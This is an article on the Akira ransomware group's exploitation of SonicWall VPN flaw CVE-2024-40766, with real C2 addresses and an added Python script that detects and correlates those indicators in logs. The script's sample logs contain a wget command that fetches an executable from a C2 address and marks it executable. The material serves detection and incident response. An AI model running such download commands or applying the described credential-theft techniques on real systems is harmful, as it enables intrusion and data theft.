An organized attack campaign run by the Akira group has been targeting SonicWall SSL VPN devices worldwide since July 2025. The group exploited CVE-2024-40766, a vulnerability in the SonicWall SonicOS operating system that had been public for over a year, to penetrate deep into the network infrastructure of businesses across many sectors. Investigation data showed that the attacks were deliberate and followed a carefully staged sequence of techniques, from credential harvesting to data theft, reflecting the professionalism and complex operational capability of the Akira team.
The campaign centered on CVE-2024-40766, an improper access control flaw in the SonicWall SonicOS operating system that affects Gen 5, Gen 6 and Gen 7 devices running version 7.0.1-5035 or earlier. Although the vulnerability was announced and patched in August 2024, it has continued to be exploited by groups affiliated with Akira operating under a malware-as-a-service model. The reuse of an old but widespread weakness in corporate VPN infrastructure demonstrates the attack team's flexibility and deep understanding of the target environment, as well as its ability to take full advantage of gaps in patch management to scale the intrusion.
On August 20, 2025, Darktrace's monitoring system detected an unusual sequence of activity originating from SonicWall SSL VPN devices. The attack began at 05:10 UTC with purposeful reconnaissance to gather information about the network infrastructure. The attackers sent a burst of requests to the endpoint mapper service and used network scanning tools to identify active servers and services. Once they had a map of the system, they moved laterally by abusing the Windows remote management service, gaining access to the domain controllers and extending their control over the entire local network.
Notably, the attacker used an advanced credential theft technique called "UnPAC the hash", which exploits the Kerberos authentication mechanism to extract NTLM hashes from service access requests and then reuses those hashes to move and escalate privileges within the network. Analysis showed that at least 15 sets of credentials were stolen, facilitating a deeper takeover and the deployment of command-and-control (C2) infrastructure. After establishing C2, the attacker downloaded malicious code and exfiltrated the stolen data.
The forensic traces show sophistication in both camouflage and exfiltration. The attacker deployed an executable packaged under the name of a legitimate VMware tool and delivered the file to the system with wget or via remote management, then ran it on target hosts, including ESXi, to open access, collect sensitive information, and bundle the data into chunks for export.
Data was transmitted outwards over encrypted channels such as SSH or HTTPS to the command-and-control infrastructure. Network analysis showed high-volume transfer sessions and anomalous connections from internal hosts to external addresses such as 137.184.243.69 and 66.165.253.39, and the TLS and SSH session patterns did not match the system's normal behavior, making them important network indicators for detecting abnormal outbound data transfers. From a monitoring and investigation perspective, technical traces such as forged file names, wget commands, the executable's hash, large SSH sessions, PCAP records of the anomalous connections, and the C2 server addresses should be incorporated into detection rules, log correlation analysis, and digital forensics procedures. This allows the intruder to be identified and isolated quickly and the data flow to be blocked.
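As an added example of the kind of detection and log-correlation logic the paragraph above recommends (this is not code from the article or from Darktrace), the script below parses a constructed flow log and process log, flags contacts with the two C2 addresses the article names, large SSH/HTTPS egress sessions to external hosts, and wget downloads of executables from bare IP addresses, and then correlates alerts per host. The log format, hostnames, the 10.0.0.0/8 internal range, the 100 MiB threshold and all sample lines are assumptions constructed for the example; only the two C2 IPs come from the article, and the executable's hash is not published there, so no hash check is included.

```python
"""Constructed detection sketch for the network and host indicators discussed above.
Only KNOWN_C2_IPS come from the article; everything else is an assumption."""
import ipaddress
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Indicators reported in the article.
KNOWN_C2_IPS = {"137.184.243.69", "66.165.253.39"}
# Assumptions for this example environment.
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]
LARGE_EGRESS_BYTES = 100 * 1024 * 1024   # 100 MiB outbound in a single session
ENCRYPTED_PORTS = {22, 443}              # SSH and HTTPS
EXEC_SUFFIXES = (".bin", ".elf", ".sh", ".exe")

# key=value pairs; values may be double-quoted (used for the cmd field).
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


@dataclass(frozen=True)
class Alert:
    rule: str
    host: str
    detail: str


def parse_line(line):
    """Parse 'KIND timestamp key=value ...' (constructed format) into a dict."""
    kind, ts, rest = line.split(" ", 2)
    fields = {"kind": kind, "ts": ts}
    for key, quoted, bare in KV_RE.findall(rest):
        fields[key] = quoted if quoted else bare
    return fields


def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def check_flow(f):
    """Network rules: known C2 contact, and large encrypted egress to any external host."""
    alerts = []
    dst, port, out = f["dst"], int(f["dport"]), int(f["bytes_out"])
    if dst in KNOWN_C2_IPS:
        alerts.append(Alert("c2_contact", f["host"], f"{f['src']} -> {dst}:{port}"))
    if is_external(dst) and port in ENCRYPTED_PORTS and out >= LARGE_EGRESS_BYTES:
        alerts.append(Alert("large_encrypted_egress", f["host"], f"{out} bytes to {dst}:{port}"))
    return alerts


def check_proc(f):
    """Host rule: wget of an executable-looking file or from a bare IP address."""
    cmd = f["cmd"]
    if not cmd.startswith("wget"):
        return []
    url = next((t for t in cmd.split() if t.startswith(("http://", "https://"))), None)
    if url is None:
        return []
    parts = urlsplit(url)
    host = parts.hostname or ""
    try:
        ipaddress.ip_address(host)
        host_is_ip = True
    except ValueError:
        host_is_ip = False
    alerts = []
    if host_is_ip or parts.path.lower().endswith(EXEC_SUFFIXES):
        alerts.append(Alert("wget_executable_download", f["host"], cmd))
    if host in KNOWN_C2_IPS:
        alerts.append(Alert("c2_contact", f["host"], f"wget from {host}"))
    return alerts


def detect(lines):
    alerts = []
    for line in lines:
        f = parse_line(line)
        if f["kind"] == "FLOW":
            alerts += check_flow(f)
        elif f["kind"] == "PROC":
            alerts += check_proc(f)
    return alerts


def correlate(alerts, min_rules=2):
    """Hosts on which at least min_rules distinct rules fired: candidates for isolation."""
    by_host = {}
    for a in alerts:
        by_host.setdefault(a.host, set()).add(a.rule)
    return {h for h, rules in by_host.items() if len(rules) >= min_rules}


# Constructed sample log lines (hosts, internal IPs and sizes are invented).
SAMPLE_LOGS = [
    "FLOW 2025-08-20T05:42:11Z host=ws-14 src=10.0.3.14 dst=137.184.243.69 dport=22 bytes_out=734003200",
    "FLOW 2025-08-20T05:44:02Z host=ws-14 src=10.0.3.14 dst=66.165.253.39 dport=443 bytes_out=52428800",
    "FLOW 2025-08-20T06:01:30Z host=fs-01 src=10.0.5.2 dst=203.0.113.9 dport=22 bytes_out=209715200",
    "FLOW 2025-08-20T06:02:00Z host=ws-02 src=10.0.3.2 dst=198.51.100.4 dport=443 bytes_out=40960",
    'PROC 2025-08-20T05:30:09Z host=esxi-02 user=root cmd="wget http://137.184.243.69/vmware-tools.bin -O /tmp/vmware-tools.bin"',
    'PROC 2025-08-20T05:31:00Z host=esxi-02 user=root cmd="chmod +x /tmp/vmware-tools.bin"',
    'PROC 2025-08-20T09:00:00Z host=ws-02 user=alice cmd="wget https://example.internal/report.pdf"',
]

if __name__ == "__main__":
    found = detect(SAMPLE_LOGS)
    for a in found:
        print(a)
    print("hosts to isolate:", sorted(correlate(found)))
```

On the sample data, `ws-14` fires both the C2-contact and large-egress rules and `esxi-02` fires the download and C2-contact rules, so both are returned by `correlate`; `fs-01` triggers only one rule and is left for analyst review rather than automatic isolation. Requiring two independent rule hits before acting is the design choice here: a single large SSH transfer to an unknown address is common enough (backups, CI artifacts) that isolating on it alone would produce false positives.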
Shortly after the first incident, researchers discovered three more incidents with the same attack characteristics, all targeting SonicWall VPN infrastructure in the US. That CVE-2024-40766 is still being exploited more than a year after a patch became available clearly reflects weaknesses in enterprise patch management. Because a VPN is a critical gateway for remote connections to internal systems, delaying updates or skipping security patches not only opens the door to malicious code but also threatens the entire defense chain, leaving the organization at risk of data loss, operational disruption, and long-term reputational damage.